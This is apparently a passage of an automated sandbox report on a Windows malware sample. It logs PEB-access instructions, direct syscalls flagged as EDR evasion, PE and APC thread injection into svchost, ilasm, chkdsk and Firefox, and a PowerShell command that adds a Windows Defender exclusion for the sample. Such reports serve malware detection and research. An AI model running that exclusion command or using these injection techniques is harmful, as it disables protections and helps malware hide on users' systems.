Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BE2E9C mov eax, dword ptr fs:[00000030h]	5_2_05BE2E9C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BE2E9C mov ecx, dword ptr fs:[00000030h]	5_2_05BE2E9C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BAAE90 mov eax, dword ptr fs:[00000030h]	5_2_05BAAE90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BAAE90 mov eax, dword ptr fs:[00000030h]	5_2_05BAAE90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BAAE90 mov eax, dword ptr fs:[00000030h]	5_2_05BAAE90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BE8EF5 mov eax, dword ptr fs:[00000030h]	5_2_05BE8EF5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BB6EE0 mov eax, dword ptr fs:[00000030h]	5_2_05BB6EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BB6EE0 mov eax, dword ptr fs:[00000030h]	5_2_05BB6EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BB6EE0 mov eax, dword ptr fs:[00000030h]	5_2_05BB6EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BB6EE0 mov eax, dword ptr fs:[00000030h]	5_2_05BB6EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C3CEA0 mov eax, dword ptr fs:[00000030h]	5_2_05C3CEA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C3CEA0 mov eax, dword ptr fs:[00000030h]	5_2_05C3CEA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C3CEA0 mov eax, dword ptr fs:[00000030h]	5_2_05C3CEA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C4AEB0 mov eax, dword ptr fs:[00000030h]	5_2_05C4AEB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C4AEB0 mov eax, dword ptr fs:[00000030h]	5_2_05C4AEB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C82E4F mov eax, dword ptr fs:[00000030h]	5_2_05C82E4F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C82E4F mov eax, dword ptr fs:[00000030h]	5_2_05C82E4F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BA8E1D mov eax, dword ptr fs:[00000030h]	5_2_05BA8E1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C30E7F mov eax, dword ptr fs:[00000030h]	5_2_05C30E7F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C30E7F mov eax, dword ptr fs:[00000030h]	5_2_05C30E7F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C30E7F mov eax, dword ptr fs:[00000030h]	5_2_05C30E7F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BDAE00 mov eax, dword ptr fs:[00000030h]	5_2_05BDAE00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BDAE00 mov eax, dword ptr fs:[00000030h]	5_2_05BDAE00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BDAE00 mov eax, dword ptr fs:[00000030h]	5_2_05BDAE00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BDAE00 mov ecx, dword ptr fs:[00000030h]	5_2_05BDAE00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BDAE00 mov eax, dword ptr fs:[00000030h]	5_2_05BDAE00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BDAE00 mov eax, dword ptr fs:[00000030h]	5_2_05BDAE00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BDAE00 mov eax, dword ptr fs:[00000030h]	5_2_05BDAE00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BDAE00 mov eax, dword ptr fs:[00000030h]	5_2_05BDAE00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BDAE00 mov eax, dword ptr fs:[00000030h]	5_2_05BDAE00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BDAE00 mov eax, dword ptr fs:[00000030h]	5_2_05BDAE00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BB6E71 mov eax, dword ptr fs:[00000030h]	5_2_05BB6E71
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C46E20 mov eax, dword ptr fs:[00000030h]	5_2_05C46E20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C46E20 mov eax, dword ptr fs:[00000030h]	5_2_05C46E20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C46E20 mov ecx, dword ptr fs:[00000030h]	5_2_05C46E20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C469C0 mov eax, dword ptr fs:[00000030h]	5_2_05C469C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C7A9D3 mov eax, dword ptr fs:[00000030h]	5_2_05C7A9D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BB09AD mov eax, dword ptr fs:[00000030h]	5_2_05BB09AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BB09AD mov eax, dword ptr fs:[00000030h]	5_2_05BB09AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC29A0 mov eax, dword ptr fs:[00000030h]	5_2_05BC29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC29A0 mov eax, dword ptr fs:[00000030h]	5_2_05BC29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC29A0 mov eax, dword ptr fs:[00000030h]	5_2_05BC29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC29A0 mov eax, dword ptr fs:[00000030h]	5_2_05BC29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC29A0 mov eax, dword ptr fs:[00000030h]	5_2_05BC29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC29A0 mov eax, dword ptr fs:[00000030h]	5_2_05BC29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC29A0 mov eax, dword ptr fs:[00000030h]	5_2_05BC29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC29A0 mov eax, dword ptr fs:[00000030h]	5_2_05BC29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC29A0 mov eax, dword ptr fs:[00000030h]	5_2_05BC29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC29A0 mov eax, dword ptr fs:[00000030h]	5_2_05BC29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC29A0 mov eax, dword ptr fs:[00000030h]	5_2_05BC29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC29A0 mov eax, dword ptr fs:[00000030h]	5_2_05BC29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC29A0 mov eax, dword ptr fs:[00000030h]	5_2_05BC29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C3E9E0 mov eax, dword ptr fs:[00000030h]	5_2_05C3E9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BE29F9 mov eax, dword ptr fs:[00000030h]	5_2_05BE29F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BE29F9 mov eax, dword ptr fs:[00000030h]	5_2_05BE29F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BBA9D0 mov eax, dword ptr fs:[00000030h]	5_2_05BBA9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BBA9D0 mov eax, dword ptr fs:[00000030h]	5_2_05BBA9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BBA9D0 mov eax, dword ptr fs:[00000030h]	5_2_05BBA9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BBA9D0 mov eax, dword ptr fs:[00000030h]	5_2_05BBA9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BBA9D0 mov eax, dword ptr fs:[00000030h]	5_2_05BBA9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BBA9D0 mov eax, dword ptr fs:[00000030h]	5_2_05BBA9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BE49D0 mov eax, dword ptr fs:[00000030h]	5_2_05BE49D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C389B3 mov esi, dword ptr fs:[00000030h]	5_2_05C389B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C389B3 mov eax, dword ptr fs:[00000030h]	5_2_05C389B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C389B3 mov eax, dword ptr fs:[00000030h]	5_2_05C389B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C30946 mov eax, dword ptr fs:[00000030h]	5_2_05C30946
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BA8918 mov eax, dword ptr fs:[00000030h]	5_2_05BA8918

Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\H25iQbxCki.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\H25iQbxCki.exe" -Force
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\H25iQbxCki.exe" -Force			Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe	NtWriteVirtualMemory: Direct from: 0x76F0490C	Jump to behavior
Source: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe	NtAllocateVirtualMemory: Direct from: 0x76F03C9C	Jump to behavior
Source: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe	NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe	NtReadVirtualMemory: Direct from: 0x76F02E8C	Jump to behavior
Source: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe	NtCreateKey: Direct from: 0x76F02C6C	Jump to behavior
Source: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe	NtSetInformationThread: Direct from: 0x76F02B4C	Jump to behavior
Source: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe	NtQueryAttributesFile: Direct from: 0x76F02E6C	Jump to behavior
Source: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe	NtAllocateVirtualMemory: Direct from: 0x76F048EC	Jump to behavior
Source: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe	NtQuerySystemInformation: Direct from: 0x76F048CC	Jump to behavior
Source: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe	NtQueryVolumeInformationFile: Direct from: 0x76F02F2C	Jump to behavior
Source: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe	NtOpenSection: Direct from: 0x76F02E0C	Jump to behavior
Source: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe	NtSetInformationThread: Direct from: 0x76EF63F9	Jump to behavior
Source: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe	NtDeviceIoControlFile: Direct from: 0x76F02AEC	Jump to behavior
Source: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BEC	Jump to behavior
Source: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe	NtCreateFile: Direct from: 0x76F02FEC	Jump to behavior
Source: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe	NtOpenFile: Direct from: 0x76F02DCC	Jump to behavior
Source: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe	NtQueryInformationToken: Direct from: 0x76F02CAC	Jump to behavior
Source: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe	NtTerminateThread: Direct from: 0x76F02FCC	Jump to behavior
Source: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe	NtProtectVirtualMemory: Direct from: 0x76EF7B2E	Jump to behavior
Source: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe	NtOpenKeyEx: Direct from: 0x76F02B9C	Jump to behavior
Source: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe	NtProtectVirtualMemory: Direct from: 0x76F02F9C	Jump to behavior
Source: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe	NtSetInformationProcess: Direct from: 0x76F02C5C	Jump to behavior
Source: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe	NtNotifyChangeKey: Direct from: 0x76F03C2C	Jump to behavior
Source: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe	NtCreateMutant: Direct from: 0x76F035CC	Jump to behavior
Source: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe	NtWriteVirtualMemory: Direct from: 0x76F02E3C	Jump to behavior
Source: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe	NtMapViewOfSection: Direct from: 0x76F02D1C	Jump to behavior
Source: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe	NtResumeThread: Direct from: 0x76F036AC	Jump to behavior
Source: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BFC	Jump to behavior
Source: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe	NtReadFile: Direct from: 0x76F02ADC	Jump to behavior
Source: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe	NtQuerySystemInformation: Direct from: 0x76F02DFC	Jump to behavior
Source: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe	NtDelayExecution: Direct from: 0x76F02DDC	Jump to behavior
Source: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe	NtQueryInformationProcess: Direct from: 0x76F02C26	Jump to behavior
Source: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe	NtResumeThread: Direct from: 0x76F02FBC	Jump to behavior
Source: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe	NtCreateUserProcess: Direct from: 0x76F0371C	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\H25iQbxCki.exe	Memory written: C:\Windows\System32\svchost.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe base: 400000 value starts with: 4D5A			Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Section loaded: NULL target: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Section loaded: NULL target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: NULL target: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: NULL target: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\chkdsk.exe

Thread register set: target process: 2640

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\chkdsk.exe

Thread APC queued: target process: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\H25iQbxCki.exe	Memory written: C:\Windows\System32\svchost.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Memory written: C:\Windows\System32\svchost.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe base: 517B008	Jump to behavior

Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\H25iQbxCki.exe" -Force	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe"	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe"	Jump to behavior
Source: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe	Process created: C:\Windows\SysWOW64\chkdsk.exe "C:\Windows\SysWOW64\chkdsk.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: uwZgUlCQSPVT.exe, 0000000A.00000002.4144996459.0000000001060000.00000002.00000001.00040000.00000000.sdmp, uwZgUlCQSPVT.exe, 0000000A.00000000.1789269963.0000000001061000.00000002.00000001.00040000.00000000.sdmp, uwZgUlCQSPVT.exe, 00000010.00000002.4145055311.0000000001530000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: uwZgUlCQSPVT.exe, 0000000A.00000002.4144996459.0000000001060000.00000002.00000001.00040000.00000000.sdmp, uwZgUlCQSPVT.exe, 0000000A.00000000.1789269963.0000000001061000.00000002.00000001.00040000.00000000.sdmp, uwZgUlCQSPVT.exe, 00000010.00000002.4145055311.0000000001530000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: uwZgUlCQSPVT.exe, 0000000A.00000002.4144996459.0000000001060000.00000002.00000001.00040000.00000000.sdmp, uwZgUlCQSPVT.exe, 0000000A.00000000.1789269963.0000000001061000.00000002.00000001.00040000.00000000.sdmp, uwZgUlCQSPVT.exe, 00000010.00000002.4145055311.0000000001530000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: uwZgUlCQSPVT.exe, 0000000A.00000002.4144996459.0000000001060000.00000002.00000001.00040000.00000000.sdmp, uwZgUlCQSPVT.exe, 0000000A.00000000.1789269963.0000000001061000.00000002.00000001.00040000.00000000.sdmp, uwZgUlCQSPVT.exe, 00000010.00000002.4145055311.0000000001530000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\Desktop\H25iQbxCki.exe	Queries volume information: C:\Users\user\Desktop\H25iQbxCki.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
